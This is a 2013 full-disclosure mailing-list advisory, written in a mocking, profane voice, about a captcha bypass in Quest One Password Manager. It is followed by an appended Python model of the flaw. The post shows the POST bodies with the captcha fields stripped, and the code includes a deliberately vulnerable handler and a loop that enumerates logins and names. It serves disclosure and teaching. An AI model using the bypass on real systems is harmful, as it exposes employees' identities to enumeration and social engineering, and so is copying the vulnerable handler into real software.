Message-Id: <8D09CA68B736C08-724-2E4B9@webmail-d297.sysops.aol.com>
Date: Mon, 21 Oct 2013 14:57:38 -0400 (EDT)
From: Johnny Bravo <j_o_h_n_n_y.b_r_a_v_o@....com>
To: full-disclosure@...ts.grok.org.uk
Subject: Wicked Smaht O-Dayuh in Quest One(tm) Password Manager
-= [ Disclosure ]=-
Filing Date: Today
Issue Tracking Numbah: 20747
Discoverorer: Johnny Bravo
-=[ Background ]=-
Quest made a password management web thing. Dell bought Quest. Dell
offers Quest One(tm) Password Manager for $5/user.
http://software.dell.com/products/password-manager/. (Oddly, this is
not a joke.)
-=[ Issue ]=-
To use the web application you need to know your domain, username, and
the value of the presented captcha. You submit that, correctly, and the
web application will present you with the user's full name and some
options.
Today we will just talk about that bit there. You do not need to
actually know the value of the captcha. Someone who is really bored
could easily enumerate logins and match them to a user's name.
-=[ Attack ]=-
On the POST request you can just remove the captcha bits. Pretty
fucking l33t. This is the kind of thing that HFG would produce. Or
maybe Gobbles. Or, more likely, se7en. And no, I didn't find this in
the "Snowden docs" although this may be an NSA backdoor... you decide!
On to the attack. The POST data normally includes the following
parameters:
ScenarioActionId=42696720-7368-6974-2070-726F64756374&UserName=domain%5Cuser&Search=false&CaptchaType=Captcha&UseCaptchaEveryTime=True&CaptchaResponse=SelfCleaningVagina
l33t hackers would send these parameters:
ScenarioActionId=42696720-7368-6974-2070-726F64756374&UserName=domain%5Cuser&Search=false
-=[ Fix ]=-
(This section is for the developers who wrote the software)
Write the code such that, oh, I don't know, it actually checks to
ensure the fucking captcha is used? Someone did this on one of the
other pages in the app. Perhaps use the code from there? If it's not
too much to ask that is.
(This section is for product owners)
Really, you bought this? Really? Really? Really?
(This section is for users)
Yes, that's right, any moron on the internets can discover your company
login id and pair that with your name if you work at a place
unfortunate enough to utilize this product. If your company doesn't
have resources to create this app themselves, they've probably
outsourced your helpdesk too, which means you're about to get pwn3d via
some fairly lame social engineering. Enjoy that.
-=[ Greetz ]=-
Dell, Quest, and the security company that either uses this shit
internally or resells it, or uses it and resells it.
Brought to youse guys by,
Johnny, Johnny Bravo
PS If you haven't seen my tips on picking up the chicks, check it out
on the youtube http://www.youtube.com/watch?v=xnGnl-UElVA.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
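The bypass in the "Attack" section and the missing check in the "Fix" section, modelled as an added example. This is not Quest's or Dell's code and was not posted by the author; it is a constructed stand-in that reproduces the behaviour the message describes: a handler that only validates the captcha when the client includes the captcha parameters, next to a hardened handler that takes the captcha requirement from server-side session state and never from the request. The directory entries, the session dict, the captcha answer "x7k2q" and the function names are all assumptions made for the example; the two POST bodies are the ones shown above, with the CaptchaResponse value replaced by a deliberately wrong answer.

```python
"""Constructed model of the Quest One captcha bypass (not vendor code)."""
import hmac
from urllib.parse import parse_qs, urlencode

# Constructed user directory: login id -> display name the app would show.
DIRECTORY = {"domain\\user": "Johnny Bravo", "domain\\alice": "Alice Example"}

# Constructed server-side session: the captcha answer the server issued.
SESSION = {"captcha_answer": "x7k2q"}

SCENARIO = "42696720-7368-6974-2070-726F64756374"

# Normal submission (captcha present but wrong) and the stripped submission
# from the advisory, i.e. the captcha parameters simply removed.
FULL_POST = (f"ScenarioActionId={SCENARIO}&UserName=domain%5Cuser&Search=false"
             "&CaptchaType=Captcha&UseCaptchaEveryTime=True&CaptchaResponse=wrong")
STRIPPED_POST = f"ScenarioActionId={SCENARIO}&UserName=domain%5Cuser&Search=false"


def parse_post(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_lookup(body, session):
    """Vulnerable pattern: the captcha is checked only if the client says
    a captcha is in play, so dropping CaptchaType skips the check entirely."""
    params = parse_post(body)
    if params.get("CaptchaType") == "Captcha":
        if params.get("CaptchaResponse") != session["captcha_answer"]:
            return {"error": "bad captcha"}
    name = DIRECTORY.get(params.get("UserName"))
    return {"name": name} if name else {"error": "unknown user"}


def hardened_lookup(body, session):
    """Hardened pattern: whether a captcha is required is server policy,
    keyed on session state the client cannot remove. The answer is
    single-use and compared in constant time."""
    params = parse_post(body)
    expected = session.get("captcha_answer")
    answer = params.get("CaptchaResponse")
    if expected is None or answer is None or not hmac.compare_digest(expected, answer):
        return {"error": "captcha required"}
    session["captcha_answer"] = None  # burn the challenge after one use
    name = DIRECTORY.get(params.get("UserName"))
    return {"name": name} if name else {"error": "unknown user"}


def enumerate_names(handler, candidates):
    """The 'really bored' attacker: submit captcha-free requests for a list of
    candidate logins and collect every display name the handler gives back."""
    found = {}
    for user in candidates:
        body = urlencode({"ScenarioActionId": SCENARIO, "UserName": user,
                          "Search": "false"})
        result = handler(body, dict(SESSION))  # fresh session per request
        if "name" in result:
            found[user] = result["name"]
    return found


if __name__ == "__main__":
    guesses = ["domain\\user", "domain\\alice", "domain\\bob"]
    print("vulnerable:", enumerate_names(vulnerable_lookup, guesses))
    print("hardened:  ", enumerate_names(hardened_lookup, guesses))
```

Against the vulnerable handler the stripped request returns the display name with no captcha at all, while a request that does include a (wrong) captcha is refused, which is exactly the inversion the advisory describes. The hardened handler refuses both because the requirement lives in the session, not in `CaptchaType`/`UseCaptchaEveryTime` fields the client controls.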